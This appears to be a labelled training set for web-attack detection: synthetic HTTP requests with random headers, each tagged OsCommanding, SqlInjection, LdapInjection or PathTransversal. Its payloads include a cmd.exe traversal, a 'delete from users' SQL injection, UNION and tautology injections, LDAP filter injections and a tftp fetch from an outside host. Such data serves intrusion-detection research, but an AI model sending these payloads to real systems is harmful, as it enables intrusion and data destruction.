Via: HTTP/4.6 204.108.5.106, eosee/0.4 www.OIoot.js, mgyOi/6.5 27.204.244.191:1718
Transfer-Encoding: identity
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
Warning: 198 www.toldzft.js "aieysaloeRmyhanfuas" "Wed, 06 Aug 08 03:23:52 GMT"
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 690061163058
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35833
Start - Id: 43611
class: OsCommanding
POST /wgY7lNy2oh5FI/wtte/bgdezDltlosrygsas1Zo/amus/la29red/y4Lh/a2BAdbNX/rzbm58YyMOQ/h4CuE/9XJZbr.tV2@9/ls-3Z54/FD2.bin? HTTP/1.0
Content-Length: 270
Content-Language: qHit,otwflaeI
Content-Encoding: gzip
Content-Location: /zsrdmnEi/mo3hab9l/ieggx.pl
Content-MD5: MXNwYXZnbXJnc2Vhdzdubw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 29 Oct 06 02:02:00 UTC
Last-Modified: Mon, 03 Dec 07 17:49:16 CET
Host: www.aiht4lo.com
Connection: pxsIyt
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: \n uftp  -p www.ienage.com  /ne/sialonalroon/islaan/ralind/ondeti/lege
Accept-Language: tdwauy-sixcs, et-i3ha4orh;q=0.6, egtm8p-z0sc
Cache-Control: only-if-cached
Cookie: Esa=LAzlikegEnguwh94s;tedwiormiae5i=8426593;ta=jr;nieadu8einjyf=roE5rG.c;az=v9CMsiac
Cookie2: $Version="5"
Date: Wed, 03 Oct 07 10:51:44 GMT
ETag: W/"xa95_w0Wlj3Xi2ojD"
Expect: sii0tlh=i1nei1yi;qiyd3=hitetaby
If-Unmodified-Since: Sun, 05 Dec 04 11:28:02 CET
If-Match: "UURFP6n@KqKYjyBBR07"
If-None-Match: *
If-Range: Thu, 28 Dec 06 07:45:19 UTC
Max-Forwards: 2
MIME-Version: 4.4
Authorization: NTLM bk1yZGVla2hoa3J2cGN5ZGxCZWVtVW1FZWFsemk2VGZsZ3JTYnVoYUw=
Range: 29587-,-5463,921-
Referer: http://www.eosaiod.net/ph70/ietonAwj/k3edd/o1xnm.tar
User-Agent: Mozilla/6.1 (Windows; U; WinNT 6.2; he-wk; rv:0.8.3) Gecko/14767456
UA-CPU: x86
UA-Pixels: 6552x5468
Via: 2.4 214.230.116.251, HTTP/4.1 152.112.100.223
Transfer-Encoding: compress
Warning: 514 www.evidcBoe.css:898 "hdt0o" "Fri, 09 Jun 06 07:45:03 GMT"
X-Forwarded-For: 1.73.97.53
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

ow1zdyi4t=rt(e7-nfsoA&R.kPRsQN2Lusr=et7o~24Gnae&boaF7=nL@sioSLX3am&hvUsoii8Zne=nbqqJe&oseoge7a1hoOhan=ixelnrdmrnoaponmne&vSDsshutdownVILZ=A 08ooptgtfc9xtermhavingr rm$&EntAhesAduarAh8=geoe isock_stream&ycymejz=458&acoez=79823&runn5atehqn1ix=5enart&yoa1tlk7js=1to

End - Id: 43611
Start - Id: 42454
class: SqlInjection
GET /hetylt7iMdf7n4rrieg/huentfaGtk/tfur1fahePutE/IdibernnU47nnoti6r/8CTX8dNzdb1sJ/7NQMMT-@HQXj3.asmx?wCtm=g+i5pEenvLe&ooigRreerw=%29w&yru1dt=%24szpbin%5Cb&IhoufDzHud4erea=egtt4nonned&selectEIZF=fsu%5D1%2B%24hie9viktipnd&t9=h8815BSaat&sfEDh0OUHVeW=OR+++9017344%3E701894904&DFUaccepta1s=amail&ocott8ebcr=049&hknethw7=qahn&glpeRm70g=eO0e HTTP/1.0
Host: www.ndeshNoivd.st
Connection: iNilh
Accept: application/zip, application/zip, video/*;q=0.8
Accept-Charset: windows-1253, x-mac-japanese, windows-1258, iso-8859-2;q=0.4, iso-8859-4
Accept-Encoding: identity;q=0.7, identity, compress
Accept-Language: *;q=0.4
Cache-Control: min-fresh=5098
Client-ip: 187.59.101.209
Cookie: t2ocdorxrourvnj=imI7nLQ;1VtSet=831893
Cookie2: $Version="41"
Date: Sun, 24 Aug 08 24:05:07 CET
ETag: "W_pGPuGCgS2Zu3QGUSai"
Expect: 100-continue
From: Oselc@mtgpaa.net
If-Modified-Since: Tue, 22 Feb 05 20:28:22 UTC
If-Unmodified-Since: Sat, 04 Nov 06 19:57:21 CET
If-Match: *
If-None-Match: ".FS959iE-.JQYRtFU99"
If-Range: Sat, 08 Sep 07 11:57:41 CET
Max-Forwards: 962
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic ZmU2b3NpZW46bmJwdDdlMw==
Range: 6369-,501-7998
Referer: /nInntio/osp44a/rohnshtg/i8jPs.aspx
TE: deflate,trailers
Trailer: If-Unmodified-Since
User-Agent: seohd (df-W83eZ; rZOzdmJngY; cNMQaWanG; 8GJD.8t)
UA-CPU: 68000
UA-Disp: 807,741,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 793x9881
Via: 1.2 www.ooeaeud.png, 9.3 156.192.8.192, bsts/4.9 www.snPinek.tiff:2
Transfer-Encoding: deflate
Upgrade: jsp/7.2, oneh/0.7, napyn/4.5, alsCmj/3.1, tec/8.4
Warning: 690 www.oh1tele.htm "oisyiybcmeat8Ot" 
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 574567754776356
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42454
Start - Id: 37765
class: LdapInjection
GET /4ufia/brlreweuoaas0oe/oxVA-rwGi-DyJn4zG76/tu.8MKVyi5Rx/nPl63jnYL1SnIx_/aPFK/sX1SPatwYUrIASn/Cficus/sr5hCX@99EbKOUaL5m/plhEi/tHZraPCfxm7yFKFD/sbfaK.php3?reeyt=384%29%28%26%28objectClass%3D19rr%29%28%7C%28sn++++%3D+++vxft%29%28cn%3DTe98++J*%29%29&1hh=72&-dfp7lin=oedatr&ssqulotmiamiWy=a7koeegtotas&qeutw=7&endureteo=6UJu&iobzssMd=1625&xlprcce=%27accept&olancisihdpa=7994&eeiocyjaz=e1rurie0swraehsAfh HTTP/1.1
Host: 88.206.54.127:5260
Connection: close
Accept: */*
Accept-Charset: big5;q=0.7, iso-8859-3;q=0.4, x-mac-turkish
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 28.9.182.133
Cookie: cttndu4os5oa=livar5tac;es=aztn;fsrYteTd=20434063
Cookie2: $Version="37"
Date: Sat, 20 Nov 04 13:12:03 CET
ETag: "obHqz4OzX93Svrt6nEXA"
Expect: atsAq
From: fssGmo@tsxudTxl.fr
If-Modified-Since: Wed, 16 Feb 05 09:51:41 UTC
If-Unmodified-Since: Sat, 04 Sep 04 03:55:11 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 14 Jul 09 19:00:28 UTC
Max-Forwards: 3
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic MzRvbG86dGVzU3hhbmQ=
Authorization: Digest opaque="maud"
Range: 059-52057,02-0322
Referer: http://www.r4jfhs.gov/pleh/hhsecwdn/9ebkous/sOacek/ecOuOe.jsp
TE: deflate,trailers
Trailer: From
User-Agent: pThnEhwt
UA-CPU: x86
UA-Disp: 3833,663,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 807x162
Via: 4.2 www.qeeaeac.jpeg:6
Transfer-Encoding: identity
Upgrade: si0/4.3, ewgHho/5.9, yibiRd/8.8, ahmafn/5.3
Warning: 938 145.133.83.75 "ehdr1rgj" 
X-Forwarded-For: 195.192.117.214
X-Serial-Number: 7486160267274211008
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 37765
Start - Id: 44083
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 189.56.173.142
Connection: keep-alive
Accept: image/jpeg;q=0.0, application/*
Accept-Charset: windows-1257, iso-2022-jp, iso-2022-jp, iso-10646-ucs-2, iso-8859-2
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 182.213.184.73
Cookie: dI2osteaqagde=omavrtjUg;rtlae=pqB5fx2I.j4p;iYLznl@P5GnX=8126;fah7risrf4htp=0139
Cookie2: $Version="4"
Date: Mon, 08 Jan 07 23:37:53 CET
ETag: W/".Z.c4.xeA3kSTWv"
Expect: ugrhejx
From: ethosr@9e25i.net
If-Modified-Since: Fri, 16 Nov 07 05:28:22 CET
If-Unmodified-Since: Sat, 18 Sep 04 02:04:38 CET
If-Match: *
If-None-Match: "BrqWlOEAFHZQeSQ"
If-Range: "Bgk78tIdC6rpnZuB2R"
Max-Forwards: 7
MIME-Version: 3.7
Pragma: o8na='dama'
Proxy-Authorization: elsyeo wweq2teU=ecoga5u
Authorization: Basic dmVtdGw6NHRoZWhl
Range: 70-
Referer: /aolhr1/cIra/dSeIRdsa/aosqB/It92gr.jsp
TE: trailers,deflate,deflate
Trailer: Authorization
User-Agent: oWpl/9.3.3.1
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 044x211
Via: FTP/8.9 206.36.6.237:3, 7.6 www.onAh.html:0
Transfer-Encoding: 2cou23
Upgrade: unHis2/9.7, sDw/8.7
Warning: 085 103.13.130.10 "4nt6qytseorniY" 
X-Forwarded-For: 180.219.181.140
X-Serial-Number: 388289600968011
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44083
Start - Id: 45809
class: PathTransversal
GET /pKpYpm7M3fgZrPkD/eYUoMuWLvqV/resobn3gOLthi/nZv.pl?QMxtermTZlqCR=%24&tbtSv=fnh3&1o=accept%29&obs.Orcopy3cn6=wN&VczaoLopdh=54&n5onlerhxrRr=e28_e9YLC0-q&thtunie6n=1811806&suh8avdyne=900106&dith=ivtmpl+dIbi1i&aer=7E.FTB7MecX7&datnf=%5Cautoexec.bat&vttdceewNpbjShi=aga&HLxmlL@Nd3=cWUa&at7naeani=edxxhkqaoivcUyObn&svPnxwrpxDnsee=rioy HTTP/1.0
Host: 1.54.118.51
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: lki-e1, eysefd-vdmtsi
Cache-Control: no-cache
Client-ip: 241.101.131.168
Cookie: 7Auonid9e=550103;ce8=4448;SwF8=ew:e;oXuxaooobad=79;alsosdttrkds=2;Oehzsseeyeo=sgXsoeiti6etndw
Cookie2: $Version="085"
Date: Mon, 06 Sep 04 05:28:04 UTC
ETag: "RXzBxEUPj84ka@n1rH"
Expect: 100-continue
From: heorumd@haetagnn.uk
If-Modified-Since: Fri, 26 Dec 08 22:37:09 UTC
If-Unmodified-Since: Sat, 30 Jan 10 21:02:28 CET
If-Match: "OAXRY3gGMQNQ6q02DtOV"
If-None-Match: "la8MYH_M63Ew4HEX"
If-Range: Thu, 13 Mar 08 24:28:32 GMT
Max-Forwards: 6
MIME-Version: 4.8
Pragma: yiha=dIphr
Proxy-Authorization: NTLM UGFBdGk4c3ZhNWk0b290ZXRodGVvb2N0UzFtT2lveXJvc2Ru
Authorization: Basic bnQ0bTU6ZWlzb2g2bg==
Range: 10-894039
Referer: http://g8si.de/jedr9n2c/Itobrug/rdtsy/etaneeo/weiwf.shtml
TE: gzip;q=0.4,trailers
Trailer: Authorization
User-Agent: Mozilla/0.9 (X11; U; SunOS sun4u 4.4; dr-ni; rv:6.4.4) Gecko/36354854
UA-CPU: PowerPC
UA-Disp: 1489,7899,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9422x259
Via: HTTP/1.8 159.220.91.125, 3.4 www.liiqTtei.tiff, tCno/6.6 www.ecorTe.htm
Transfer-Encoding: compress
Upgrade: T7eg/6.6
Warning: 146 www.lsdhDul.jpeg "nnetelfllaw8" 
X-Forwarded-For: 20.38.1.164
X-Serial-Number: 97437776345
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45809
Start - Id: 41675
class: SqlInjection
GET /adgdo2sovsEes/oX3LTirN-2BBM/aKYGgXlspasswdNQB/RbZXOmm6af.htm?hhdn0marntg=%27+++%29%3B+delete+++from+users%3B+++commit%3B++dummy%28++%27 HTTP/1.0
Host: www.e5awe.cz
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 152.95.8.177
Cookie: U98hQ=200411;msseeens=00855412;dobject1H=oh(c37 ;c3susr=r<;v66ywOrLef= ope<odoxvt copymdnph-;51rauktlzoecr=f
Cookie2: $Version="44"
Date: Tue, 05 Feb 08 11:37:37 GMT
ETag: "1zVBvOqG3coFp9.PL"
Expect: yet76a=do4DczS;yi2en=hsePcye0
From: wnytdt@bdcjnzt.org
If-Modified-Since: Tue, 26 Oct 04 17:54:07 GMT
If-Unmodified-Since: Tue, 20 Jun 06 12:05:27 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 27 Jan 06 14:28:43 UTC
Max-Forwards: 942
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: ne1cn l3hIf=adoal
Authorization: NTLM Qmx0ZVlpaHNkbjBlcWFmZERvTzF0ZTJ5aGRFd3VvaWRpZXJtdQ==
Range: -91,787-299778
Referer: /smfm1/fanqgeN.gif
TE: deflate,trailers,chunked;q=0.6
Trailer: Host
User-Agent: Mozilla/8.1 (compatible; 8ffendOp; WinNT; aOtt6T4g; hevchyieoe; xixfaqwm)
UA-CPU: MIPS
UA-Disp: 467,9045,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 232x3893
Via: FTP/1.7 35.198.25.46, FTP/4.6 www.pdicdn.html:9
Transfer-Encoding: identity
Upgrade: dahek/1.1, htct/7.8, rrepda/5.7, eos/3.6, uoe/1.9
Warning: 530 32.109.118.103 "hOGeuun3sa018i" 
X-Forwarded-For: 46.66.131.26
X-Serial-Number: 611965021882313
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41675
Start - Id: 42239
class: SqlInjection
GET /yTn83oasGneh/uoqnH0t9dC0b/5tapowlrfehosivheodS/xeqeN6chtdemuItt/b2v-ovSp-TlWAj9bZR/wBw/ly6f.html?nbwra5kh=npasswdmtirheolv+Mlike%5DE9syi&cb5EfhCranj=022458&zqneoi=teneYa&aZl=98430780&pe0=%27+++++OR++++%27aiixA%27++%3D++++%27tap%27%2B%27Tel%27&cpToeesahWe=6vroi4+nen&-home0dIupdateSB=aourii&resE5tUkjz=%27hha%3C+eete&tnArlA=prd&hethsz0cehae=tsnnXrsam5ba%3Dsf&ntnd0=35928179&ggPRllduocc=6enhA3ae&mrlw=29037&tuteaeb=lolrnfaDrcs HTTP/1.0
Host: 40.22.85.32:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: nrEhb-nc
Cache-Control: max-stale=05872
Client-ip: 104.162.121.20
Cookie: fra1oeos= 0etud l3ut ;DfHe1dCMjR=9;he2egNaefe=IrJe xvet-iems9
Cookie2: $Version="26"
Date: Sun, 21 May 06 24:21:38 CET
ETag: W/"I_dMSOn75Rh5PGE"
Expect: 100-continue
From: AhkTtd8@hidg5ir.de
If-Modified-Since: Wed, 30 May 07 16:18:04 UTC
If-Unmodified-Since: Fri, 02 Dec 05 05:15:25 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 26 Mar 06 11:02:42 UTC
Max-Forwards: 7
MIME-Version: 1.3
Pragma: sti=semy
Proxy-Authorization: NTLM M2FlbzFvd2R2amFoamFybnhjcWx1dXRkMXZhOXhMaXRtbmtzc2RPYXBl
Authorization: jlaeo nf6ee7he=tqriai
Range: 4539-14148,-19,934-
Referer: http://enceaa9p.be/tadbttbe/pd1oi.tiff
TE: trailers,trailers,trailers
Trailer: Expect
User-Agent: Mozilla/9.1 (Machintosh; U; PPC 2.6; It-tc; rv:3.1.9) Gecko/78275411
UA-CPU: StrongARM
UA-Disp: 8058,0040,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 108x2342
Via: 9.3 www.zieguner.shtml
Transfer-Encoding: gzip
Upgrade: sssi/2.7, rim/3.4, mCeth/1.0, n82sil/5.7
Warning: 028 56.37.102.108 "t6tlhhan1eX2IilnhgP" 
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 29366252
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42239
Start - Id: 41188
class: SqlInjection
GET /ijS9-fwEU3xZ.htm? HTTP/1.0
Host: 134.184.187.142
Connection: oeflzgpr
Accept: */*
Accept-Charset: *
Accept-Encoding: '   )     UNION ALL SELECT  61880   FROM edrOOa     WHERE ( ''    =   '
Accept-Language: '     /**/    OR   /**/ 'Enl'  >    'S
Cache-Control: only-if-cached
Client-ip: 151.63.160.140
Cookie: oa2=taedYyG;et8axee=rm3&hifrtchildmnidet7;um8eeseKhnoacs0=482301464;B@jMZai=387197
Cookie2: $Version="3"
Date: Mon, 09 Apr 07 07:12:19 CET
ETag: "ThY1cTTEqxmOVuYl"
Expect: 100-continue
From: hnrnbiad@nJninesrqA.biz
If-Modified-Since: Sat, 31 Mar 07 06:30:22 GMT
If-Unmodified-Since: Sun, 27 Jul 08 17:12:55 CET
If-Match: *
If-None-Match: "ceix1PT.YXfQIG7"
If-Range: Thu, 14 Feb 08 02:41:37 UTC
Max-Forwards: 4909
MIME-Version: 2.7
Pragma: dbtinie='vtiiab'
Proxy-Authorization: Basic dGxzUDpoZW92aQ==
Authorization: sda5A h990hii=Siyhyle
Range: 5154-283,-781,-71
Referer: http://www.tx5hedn.net/aseN4ete.jsp
TE: chunked,gzip,trailers
Trailer: Date
User-Agent: Mozilla/4.4 (compatible; uIel; Win98; Oo3lrfy; aioteos)
UA-CPU: MIPS
UA-Disp: 8221,0714,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 9560x6945
Via: HTTP/2.2 49.121.234.30
Transfer-Encoding: oncttw; dstndek=egjeeayl
Upgrade: tsecta/8.0, aaav/5.4, eE0/6.3
Warning: 570 20.88.197.170 "eeqmmpr1httetaoyox" 
X-Forwarded-For: 247.67.228.93
X-Serial-Number: 7584461693588
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 41188
Start - Id: 37033
class: LdapInjection
GET /GabiznaQa/.ANiKa/ibNi3a1vorv/yiGititernr8rli.jpg?eeeacTi=958019779&epuwnlt=91106418&fd=im&niahF9nhuAsy=h4&LdU6ol=tyuFD65N4RI&em5wEdsRi5Vo=%3CmeppasswdtuDs%5Da%27t%3Ewhome%25&iaEeslStnHL=usu&anetsd4t=29575&tl=c3sTgLhomes&_.SsYzn=bmadmin&tre4h=9Y21jJBGTpcr&atleieeoeAt=dd&hr8r=2083%29%28%26%28objectClass%3Deiw%29%28%7C%28sn++++%3D+5ao%29%28cn%3Drp++++J*%29%29&hhliauna=3on+noscriptarwtdli+h%3A HTTP/1.1
Host: www.ustonraCo.fr
Connection: ztakr
Accept: video/*, image/*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: yRq='lt'
Client-ip: 228.88.111.225
Cookie: s5eghbd1=i;lmte=eN st0Ni[r?nNv;mnOhx.I4=88679
Cookie2: $Version="95"
Date: Mon, 31 Jul 06 11:23:47 UTC
ETag: ".SThcMpKfONI8Cjdcf"
Expect: kodtt
From: lkiihrt@HleY.cz
If-Modified-Since: Sat, 16 Dec 06 18:54:11 GMT
If-Unmodified-Since: Mon, 26 Feb 07 07:31:34 GMT
If-Match: "3dTQFi5lg15QF-a1M"
If-None-Match: *
If-Range: "iy2.9BK1JPsvN9p"
Max-Forwards: 07
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="isetlaxp"
Authorization: 7leiRa otmjthT=taes
Range: 13730-521,976-,-1177
Referer: http://www.dnadkib.gov/ps6faya/8erwe/r34rpse/tfiv.sh
TE: trailers
Trailer: Connection
User-Agent: Mozilla/8.8 (Windows; U; Windows NT 7.5; OH-li; rv:2.7.5) Gecko/26884480
UA-CPU: MIPS
UA-Disp: 2495,217,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9902x0663
Via: HTTP/7.1 www.itoyhei.shtml
Transfer-Encoding: h4e2Oh; zotoikeu=rAgrxl
Upgrade: seta/1.0, wmndNp/4.4
Warning: 561 255.42.223.99:0 "naeetom" "Sat, 31 Jul 04 14:02:35 GMT"
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37033
Start - Id: 41534
class: SqlInjection
POST /r3hd8C5x0g/ae0etsoec1z/50xKwIZV8qdY.png? HTTP/1.1
Content-Length: 324
Content-Language: h
Content-Encoding: compress
Content-Location: http://www.ayIqywi.gov/Ttezs/viop/NZe4Yno.jpg
Content-MD5: d3R0aG1kYWNiZXJveFNibg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 15 Jul 04 08:26:51 UTC
Last-Modified: Thu, 12 Jun 08 08:40:27 GMT
Host: www.Yf8t.uk
Connection: close
Accept: application/*, image/jpeg;q=0.1, audio/*
Accept-Charset: iso-8859-15, utf-8;q=0.5, iso-8859-7;q=0.5, x-mac-hebrew
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: max-stale=2105
Client-ip: 124.86.136.28
Cookie: rcrgE9194i=9807713;rys02iwX=lulri3nrh48
Cookie2: $Version="111"
Date: Wed, 03 Mar 10 16:51:15 GMT
ETag: W/"PqTaCJxgsAvQFa_UT"
From: htsmyA@nheod.it
If-Unmodified-Since: Sat, 22 Jul 06 21:33:33 GMT
If-Match: *
If-None-Match: "ggPdVKhnRtvW-l33-1v2"
Max-Forwards: 414
Authorization: NTLM c3FvcmRmZWljb3ltZUF4VGF1bWloc2lkaG9OaG50bWhl
Referer: http://awIni.it/nsi3/rntmqdnE/eozr/hlhaa.mdb
TE: trailers,deflate,trailers
User-Agent: Mozilla/3.8 (Windows; U; Windows NT 8.9; Gr-en; rv:3.6.5) Gecko/19911256
UA-OS: Windows 98
UA-Color: color8
Via: 1.9 www.opea.tiff
Transfer-Encoding: deflate
Upgrade: ied/4.5, ed6tn/2.3, fotom/3.2, ooni/6.1, hhIt/6.5

abxwitg=Iezwtc8esloriOc&ulenrh=Adbl0RPer&isufbrrEme='select customer_phone   '||'from   customers     '||'where customer_surname='''||     lv_surname||''' and     customer_type=1';&5IElibMpT@0aB6F=1&lLT8ea=hGZbkh2&lfoeji=e&s4nus=ekPRWx5M&NdntzmcLt=h&tiohhDa=Iesamd&CA7_=nefyraje

End - Id: 41534
Start - Id: 42467
class: SqlInjection
GET /o2hpethixndacmtbyx/bqeoty@I@/hnlw7/tEtMr364S/nOcyhvodwIamcaa/rR6YLS5@mN3-_m4G8@Sq/j29/w8.asp?ogS=00&oedBasi=%27%3B+++++begin+declare++%40ret++++varchar%288000%29+++++set+++%40ret%3D%27%3A%27+++++select+++%40ret%3D%40ret%2B%27++%27%2Bthtoa%2B%27%2F%27%2Bpassword++from++++oaik4rg++++where+++++ho%3E%40ret++select++%40ret++as+++++ret+++++into+foo+++end-- HTTP/1.0
Host: www.Pqsitsl5.gov
Connection: keep-alive
Accept: audio/basic, image/*;q=0.3
Accept-Charset: iso-8859-15, iso-10646-ucs-2;q=0.3, iso-2022-jp, iso-8859-8
Accept-Encoding: 
Accept-Language: rioIrsst-riI, Nrdeo-ceea3;q=0.7, kwokzc2-tIkr
Cache-Control: max-age=2
Client-ip: 88.195.225.227
Cookie: opt1null7yQm-Sc=9cR;ilpet=alxmle;hee=ai;ceed=;D;meiiaekaL7g=i3;Ndcsevieeno=sastasmh
Cookie2: $Version="3"
Date: Wed, 23 Mar 05 14:10:48 CET
ETag: W/"UAyFtb4@EEegyBiy."
Expect: 100-continue
From: eabBn@aahunaiie.fr
If-Modified-Since: Fri, 07 Jan 05 03:07:10 CET
If-Unmodified-Since: Sun, 13 Mar 05 03:49:30 CET
If-Match: "-U7FdqCWo.2VbJWTuB_"
If-None-Match: *
If-Range: "NJd1NRKicrJPiTZwtjU"
Max-Forwards: 218
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: 7an4e 9cqe4e=chEots
Range: 464608-7,46934-
Referer: /orbdeu/dbc4e.css
TE: trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/1.2 (X11; U; Open BSD i586 4.0; ao-cE; rv:2.6.0) Gecko/79257743
UA-CPU: 68000
UA-Disp: 1488,9515,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 733x829
Via: HTTP/8.9 www.bNermra.jpeg
Transfer-Encoding: identity
Upgrade: mc9c/0.1, Rek40w/1.3, rcow/4.1
Warning: 899 www.i1dtW1t.js:1401 "nerre4v" "Thu, 17 Mar 05 06:33:46 CET"
X-Forwarded-For: 83.163.212.155
X-Serial-Number: 242296099385997
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42467
Start - Id: 37913
class: LdapInjection
GET /EddocumentJN/o42K/ethruaaHpyep/6b5YzjyRLId0acft/tlv/gPha36rhj.lE53KkqBY/df0t7/c4szmR4PVh-BJH/nl6ohs9/xndbfeybuHtmtndht.jpeg?6dLEe=5720&AzmLB=240501&8eem9Edu=eHq4Q&Xrkr9lj=eEfiuWUsae&ivrnnd=xy%29%28++++%7C+%28nohlo%3D*%29&a_v1=32&exetrmomk9tgit=723883194&ecn5eQewSe7ojhy=8t9leezrgUnal7Taf5&1aieepisngi=87600&cIrnEn=681&po1SoebTphnlehi=-l7 HTTP/1.1
Host: 38.199.53.177
Connection: keep-alive
Accept: video/*;q=0.8, audio/basic
Accept-Charset: windows-1253, windows-1251, windows-1250;q=0.5, iso-8859-4
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 206.217.112.201
Cookie: msmntE=Deolm8Et
Cookie2: $Version="988"
Date: Wed, 10 May 06 20:58:07 CET
ETag: "wOq5RcWCDamiFvJi"
Expect: aPouw=afta
From: ricsu5la@emarau.st
If-Modified-Since: Mon, 20 Aug 07 03:16:40 UTC
If-Unmodified-Since: Fri, 12 Jun 09 02:40:26 GMT
If-Match: *
If-None-Match: "nn.aGJcXiGQ.bxX9"
If-Range: "xNIn41ga3M_PIV28MzhN"
Max-Forwards: 17
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest username="Ecqddp7j"
Authorization: Digest opaque="toio"
Range: 462856-56111,-65
Referer: http://www.ZASes.ch/esvm3/ewiDqso/a3yn/rwqiiyia.asmx
TE: chunked,trailers,gzip;q=0.3
Trailer: Host
User-Agent: ellSthahrPiat
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 649x451
Via: 4.7 www.otneeng.tiff, 7.1 www.ohtji.jpg
Transfer-Encoding: umnc2
Upgrade: vmr4ce/8.6, ad1h/2.0, 4cr/6.0
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 94.140.32.18
X-Serial-Number: 03021
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37913
Start - Id: 35284
class: SqlInjection
GET /aev79HCW-ujZ2zkWMV/dCHAu-/tusrl_7dAO%uMR/h3t5XrXj/hh0H.tiff?utnhcWl=sbo%5D&LA0ocmdrmS0a-BzG=233&ehtpuer9uanll=eroeiEroeg+kg7&uEevgatyNdefwx=dsEeXueCwe&1HHfubK4CIautoexec7=qwer%27++++or+nxH9ttd_v.Account%3D%27sNul3ewh%401s19s.com&HSiiAQyUDBGI=%3B&eMi=rNeausqnmeu&yufEAt8rontfpt2=gureire3Uf%7EsGhomesaR&ismtaierI=si35pmhzoupo6&gleboiuc0=6480566&nYAeoi=0tchildl+a7oo3 HTTP/1.1
Host: www.meidopft.com
Connection: close
Accept: */*
Accept-Charset: shift_jis;q=0.2, windows-874;q=0.6, cp-950, x-mac-arabic, koi8;q=0.0
Accept-Encoding: *
Accept-Language: n4nI9-aenpe;q=0.6, Ivc-sictp, hai-i;q=0.9
Cache-Control: only-if-cached
Client-ip: 117.242.130.149
Cookie: neortmC=tlli\=-NtQzeq&iAeunionk;B3t6nwsaaaeE3tu=hYwqxDK;ez0nq=kdsr
Cookie2: $Version="2"
Date: Mon, 04 Jul 05 16:29:38 GMT
ETag: W/"4f5c3nludUACevP"
Expect: tomlS4
From: g1swIsn@rorentof.uk
If-Modified-Since: Wed, 26 Nov 08 09:58:44 CET
If-Unmodified-Since: Sun, 04 Feb 07 18:37:10 CET
If-Match: *
If-None-Match: "0oEmttD7D49uyqyTF3Z"
If-Range: Thu, 16 Feb 06 19:09:52 UTC
Max-Forwards: 664
MIME-Version: 8.3
Pragma: O=xEupnsst
Proxy-Authorization: NTLM bnFzaU5lenR0dWVzeFNuZXNiaVRsTFNiMnNhMmRzc3dhdGZzNg==
Authorization: NTLM bnRheXZuc0VlZWRpdWVvZXNtbHQyZGZvRWVhOGQzcG50eWlvYmVvenRnc1BhYUM=
Range: 930-456,2355-
Referer: http://www.rxno0.cz/uties/tii8eyo/4lpr.mp3
TE: deflate;q=0.4,chunked;q=0.8,gzip;q=0.9
Trailer: Warning
User-Agent: oe3ss4e3
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Mac OS X
UA-Color: color8
